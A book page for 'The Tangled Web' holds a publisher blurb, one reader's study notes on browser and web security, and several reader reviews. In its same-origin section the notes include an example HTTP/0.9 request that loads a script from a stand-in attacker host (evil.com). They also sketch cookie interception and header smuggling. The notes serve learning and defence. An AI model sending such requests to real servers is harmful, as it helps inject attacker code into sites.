"Thorough and comprehensive coverage from one of the foremost experts in browser security."
—Tavis Ormandy, Google Inc.
Modern web applications are built on a tangle of technologies that have been developed over time and then haphazardly pieced together. Every piece of the web application stack, from HTTP requests to browser-side scripts, comes with important yet subtle security consequences. To keep users safe, it is essential for developers to confidently navigate this landscape.
In The Tangled Web, Michal Zalewski, one of the world's top browser security experts, offers a compelling narrative that explains exactly how browsers work and why they're fundamentally insecure. Rather than dispense simplistic advice on vulnerabilities, Zalewski examines the entire browser security model, revealing weak points and providing crucial information for shoring up web application security. You'll learn how to:
Perform common but surprisingly complex tasks such as URL parsing and HTML sanitization Use modern security features like Strict Transport Security, Content Security Policy, and Cross-Origin Resource Sharing Leverage many variants of the same-origin policy to safely compartmentalize complex web applications and protect user credentials in case of XSS bugs Build mashups and embed gadgets without getting stung by the tricky frame navigation policy Embed or host user-supplied content without running into the trap of content sniffing For quick reference, "Security Engineering Cheat Sheets" at the end of each chapter offer ready solutions to problems you're most likely to encounter. With coverage extending as far as planned HTML5 features, The Tangled Web will help you create secure web applications that stand the test of time.
A bit dated as any 7 year old web related book, I picked it up to get a good grasp of the definition and impact of things like XSS, XSRF, Header splitting, etc.
Most of the book is still relevant but some stuff should be revalidated since they may be deprecated like XDomainRequest.
What I like about these older books concerning the web is that they're an easy read, that is, by having a bit of knowledge of some of the concepts, getting a deeper understanding is straight forward.
Notes
It Starts with a URL
- scheme://login.pwd@address:port/path ?search#fragment - The protocol and // signal an absolute url. - Pseudo protocols: * view-source:http://... * data:text/plain,somePage,inlineDocument - Transfer-Encoding: chunked (for transmitting steam data without specifying content-length).
HTTP
- HttpOnly: cookie attribute to prevent reading from document.cookie. - secure: only send cookie over HTTPS. * If not, even if https://site.com sets a cookie, an attacker can just wait for you to go to http://otherSite.com, inject a frame, point it to http://site.com, intercept the TCP handshake and grab the cookie. - HTTP request: * First line: method - path - version * Headers split into one per line, ending with a CR/LF * Request body starts after the empty line. - HTTP response: * First line: version - response code - response keyword * Headers and payload same as request structure.
HTML
- &, <, >, ', " should be escaped. - Named entities: > equals > and & equals ampersand (for encoding/obfuscating characters including attributes). - Documents not loaded through HTTP lack headers, causing browsers to improvise things like MIME type and charset. * Something like this might help sometimes . * But some may never work cause it's tot late in the rendering process like changing the document type . - Hyperlinks target view might get access denied and open in a new window (same-origin maybe?). * Possible values: _top, _parent, _blank, [a name]. - Forms with no action param get submitted to the document location. * Forms with GET method are submitted with named fields as query string, plus signs are encoded like “%2B”, and spaces are replaced by plus sign: /action?field=name+lastname&four=two%2Btwo. * For POST the default is to include params as the request payload or body ( application/x-www-form-urlencoded).
CSS
- @charset sets the css file charset.
Content Isolation Logic
- Same-origin is based on DNS not IP. * Susceptible to DNS rebinding: intentionally pointing DNS to a new IP. * Browsers try to mitigate by caching DNS lookups. - Remove subdomain from document.domain to relax same-origin. * document.domain doesn't work for XHR. - Content-length: payload length header which is always set by the browser. * Could be overwritten by XHR, causing a second request to be smuggled through on keep-alive sessions as part of the 1st request body. * So most browsers prevent modifying some headers: Content-length, Referer, User-Agent, Cookie, Origin. - TRACE HTTP verb is banned almost everywhere, used fore debugging, allows you to trace requests hops. - Servers still support HTTP 0.9, one-liner protocol easy to exploit. * GET\thttp://evil.com/evil.js\n\n * or also: GET\thttp://evil.com/evil.js\tHTTP/1.0\n\n - Cookies are set for the domain param (and any subdomain starting from there) and the path. - At some point you could access HttpOnly cookies through XHR: req.getResponseHeader('Set-Cookie'), may still be possible. - Cookies can be overwritten from non HTTPS, non HttpOnly or non secure parts of your site. - Cookies don't include protocol.
Outside of Same-Origin
- X-Frame-Options (deny or same-origin): prevent page form being framed, so it cannot be tampered with, like click hijacking or phishing. - To mitigate keystroke redirection, browsers prevent focus switch while on keypress. * It doesn't work completely cause attackers can roughly predict what keys will pressed next and at when based on English language, thus, making the focus switch at the right time.
Other Browser Boundaries
- 3 types of URL schemes. * UnrestrictedL HTTP, HTTPS, FTP. * Partly restricted: file:, data:, javascript:. * Restricted: about:, res:, chrome: (cannot be navigated to under any circumstance). - Third-party Cookies are used by ad sites to tag users.
Content Recognition
- Content sniffing: if Content-Type is missing, browsers will try to guess the resource type based on heuristics like the extension or payload inspection. * HTTP specification permits sniffing only in the absence of the header. * For malformed MYME types, browsers may still use sniffing. - X-Content-Type-Options: nosniff. - Content-Disposition: attachment (may trigger a download dialog box).
New Features
- CORS only allows GET, POST and HEAD. * Response headers must include Access-Control-Allow-origin (can use wildcard "*"). * This origin must be the same as the origin header of the request headers. * For non simple requests, browsers may do a handshake first by sending an OPTIONS preflight request to see if the user is allowed. ^ This can be cached. - Content Security Policy (CSP): for controlling what can be loaded with the src attribute. * X-Content-Security-Policy * X-Content-Security-Policy-Report-Only: warning only without failing HTTP requests. - Sandboxed frames: allow you to policy control content displayed and loaded by embedded frames. * allow-scripts, allow-forms, etc. - HSTS or STS: http strict transport security, to prevent browsers from navigating to the non-https version of a site at first and then immediately redirecting to https, allowing for the first request to go unencrypted. * Strict-Transport-Security: max-age=30000; includeSubDomains
Common Vulnerabilities
- Cross-site request forgery (XSRF / CSRF) * making requests to the server impersonating the user client. - Cross-site script inclusion (XSSI) * load JSON-like responses through script tags. - Cross-site scripting (XSS) * non-escaped inputs allowing attackers to plant html or scripts on your site. - Header injection or response splitting. - HTTP downgrade - Cache poisoning - Cookie injection - Network fenceposts: with the help of DNS rebinding, an attacker may be able to see responses to all server requests. - Vulnerabilities on the server: * Buffer overflow * Command injection like SQL * Directory traversal * File inclusion * Format-string: allow attackers to plant a string into a templating function like printf(). * Integer overflow * Pointer management
Read about 2 times , Not bad to get an idea about the Client-side and browser's holes But for web app pentesting generally!!! It might not help a lot But still suggest reading specially for those who already done with the classic web vulnerabilities and need deeper look at the browser's side would classify it in the same category off "browser hacker's handbook" , but to be honest there is some nice tricks and notes regarding web technologies in this book and that's why am giving it 3*
Considering the OWASP Top Ten lists the same/similar security issued even after a decade, Tangled Web is still a worth read keeping in mind that most of the specifics are very much outdated.
I’ve been interested in IT security for a long time, but obviously even more so since I started working professionally in this area. Since web applications have become ubiquitous in recent years, they constitute a big part of our penetration testing work. This is a very broad topic, so The Tangled Web: A Guide to Securing Modern Web Applications by Michal Zalewski is an ambitious project.
The first thing I noticed was that the book is comparatively thin. At around 300 pages it’s only about one third of The Web Application Hacker’s Handbook: Finding and Exploiting Security Flaws. Don’t let that fool you though, this book is not a lightweight by any means. It’s logically structured in three parts, the first of which explores the various components that constitute the web as we know it today (URLs, HTTP, HTML, CSS etc.) and their security implications. This is followed by a look at the security features — and their shortcomings — of current browsers. After this part 3 deals with current developments and the future of browser and web application security. This is rounded off by a list of common security problems including references to the chapters of the book that cover them, as well as an epilogue with a surprisingly philosophical outlook on IT security and trust in human societies.
The writing was clear and to the point, with tons of footnotes and references to provide the interested reader with the chance to further research the presented topics. The author clearly knows what he’s talking about and manages to present it in a very approachable way. Due to it’s limited size the book still has to be a bit dense though, so I never really felt like reading more than one chapter at a time, otherwise it’d have been to much information to take in at once.
Whether you work in IT security or are a web application developer, this definitely is a book you don’t want to miss.
The Tangled Web: A Guide to Securing Modern Web Applications is a fairly solid introduction to computer security in the context of web sites/browsers with one fairly major downside: it was published 7 years ago. In the context of the Internet, that's... quite a while.
Which this book was published, IE had a 40% market share, followed by Firefox with 30%, and Chrome with only 20%. Given that more recent numbers show Chrome with 70%, FF with 10%, and IE + Edge together only at 10%... the Internet has changed. Since it was published, Flash is the next best thing to dead. HSTS and CORS are everywhere now (mentioned as future technologies in the book). Some issues just ... aren't any more, while a whole new kettle of worms is about.
That being said, it's actually a pretty decent introductory book. Some things never change. The internet is still driven by URLs and cookies, and even the introduction of HTTP/2 and HTTP/3 now don't change things that much. For the most part HTML is still HTML (although HTML4/XHTML issues are less relevant than they used to be). Even with CORS, SOP is still an issue, as is content types.
So really... you could do worse if you're interested in learning a bit about computer security. Especially if you picked this book up as part of a Humble Bundle. :)
Shows the numerous ways in which the web has failed in terms of security. More importantly, the book shows the reasons why these problems have occurred.
Even though some of the discussed problems have been mitigated during the years, and there are more secure methods available, the book is still very interesting, and some of the attacks are still relevant.
some of the basics is still relevant today but the vast majority has been adjusted / edited; well, the book has been published in 2012 (I have got my hands on the Polish version from 2012). I stopped reading it somewhere in the middle, hm, I have a feeling lots of things are extremely dated and fairly s0 (for example, there is info on Internet Explorer and Flash - dead as of Jan 2021) But still, if you come across it - it is a fine read
I got through maybe 1/4 of this book, then skimmed the rest for takeaways. What I got was great, and I will keep it around as a reference. Recommended. Although dense, I could get through half a chapter at a time before I felt like I was on information overload. For a technical book, that is pretty great.
Very detailed overview of web browser design and security. Will be dated soon, but for now, is the best resource of its kind. I'm still amazed that the web can be so exploitable, yet work so well.
Even accounting for the fact that this came out a while ago and the web is a fast-moving target, this is not a good book.
I have a background in developing web applications on both the server and the front end, so I feel like I ought to be able to get something out of this. But the book has a pattern of going on for a long time into internet basics that I'm already familiar with, then suddenly dives into particular vulnerabilities that are so poorly explained that I can't tell whether they're happening on the server or the browser, why they're a problem, or what someone might do about them.
I put this book down at 17% when it asserted that get and post are basically interchangeable; if it's making that kind of oversimplification of things I know, I don't trust it to tell me about anything else.
Needs an update for sure, but quite enjoyable still. The tongue-in-cheek intro about academics looking into web security was quite funny. Definitely protested inside "but they really are manifestations of the confused deputy problem"!
"Part of the problem is that said experts have long been dismissive of the whole web security ruckus, unable to understand what it was all about. They have been quick to label web security flaws as trivial manifestations of the confused deputy problem[1] or of some other catchy label outlined in a trade journal three decades ago. And why should they care about web security, anyway?"
This can perhaps be boiled down to "user-generated content is hard."
But really: decently interesting read, though definitely in more of a reference format than Silence on the Wire. I learned a few new things, and would definitely come back if building a site with user accounts. Yes, at six years old some parts are getting a little dated (IE6 security problems aren't that much of a burden, thankfully), but it's not like XSS isn't an issue these days.
A great read about Cross-Site Web Forgery and other exploits that a developer should be aware of when developing for the web. A lot of his techniques have since been patched, but are cool to note that they were once problematic. Novice web-developers and web-designers should be aware of these problems before developing. I highly recommend reading it through once.
Fantastic overview of modern-ish web applications, as well as the history of how we got here. While it doesn't go into detail about modern frameworks, it does go into detail on the entire hacking process from loading a URL to HTML parsing to content security policies.
Introductions to Cybersecurity and application security in general are hard to find. The Tangled Web stayed relevant and for the content is relatively consumable by newbs.
I guess this book was legendary 10-15 years ago but is not really a book to read on 2021, most of the things mentioned are either obsolete or dead technologies.
This was the first book I've read about web security, recommended by a fellow who lectured on the subject at our company. It wasn't organized exactly how I expected, but I think that was a good thing. I was expecting the book to list the vulnerabilities outlined in OWASP one by one, explaining what they are and how to prevent them. However, those were not discussed until at the very end of the book. Instead, the bulk of the book was really about understanding every little piece of the puzzle that makes the web, the browsers and the servers communicate and work. It started from HTTP mechanics, onto HTML quirks, CSS, Javascript... all these little pieces were covered.
The aim of the book, as I see it, was to make the reader first understand how the web works. In each chapter security issues were discussed basically related to the topics discussed in that chapter, while linking it, from time to time, to the big picture, which is, basically, the OWASP list of vulnerabilities.
So, while the book was not organized the way I expected, I really ended up liking the way it is now. I now know a lot more about each component of the web, which helps me understand the security issues better. This book is also remarkable in the sense that it doesn't waste time on irrelevant issues: I felt that every page and every chapter contained information that is useful. The writing style was very consistent and to the point.
Awesome book, joy to read. It's dense, but written in a cheerful tone. The author knows a lot about web security. It's not bound to a narrow set of technologies, frameworks, OSes or browsers. It touches a little bit of everything. But it doesn't make it shallow. I wasn't aware about 90% of information presented in this book. It has no cumbersome and useless terms security charlatans like. It's very practical and full of advice.
I felt slightly uncomfortable because it was written around 2011. Some facts are clearly outdated (Flash is dead in 2019), some "things to come" became a bedrock of the modern web (CORS). At the same time I was glad it mentions those outdated facts. It provides historical perspective so you can see why the web works like this. For example, it has an explanation why "Download/Open" buttons have such a weird and annoying delay.
Excellent source for browser and web application related security features. Underlines the current reality, that web app environment is (too) complex and full of features that are easy to forget, misconfigure or overlook. I must admit that I just browsed parts of the book because of its technicality, but this is a keeper in case I need to check some nitty-gritty details of browser, web protocols, plugins, Javascript, etc.
The book has a chapter of planned new security features, also. It was mentioned that the dream of inventing a brand-new browser security model is strong within the community, but it would require rebuilding the entire web. Therefore the practical work focuses on humble extensions, which unfortunately increases the complexity of the security-critical sections of the browsers code.
A really important read for anyone working on web front-ends in 2015. Great overview of a ton of major issues and concerns, including a bunch of stuff that less-technical folk (like product owners) would benefit from knowing, particularly when it comes to thinking through test scenarios in highly-stringent environments (e.g., where PCI compliance is a concern). Very thorough and complete without being obtuse.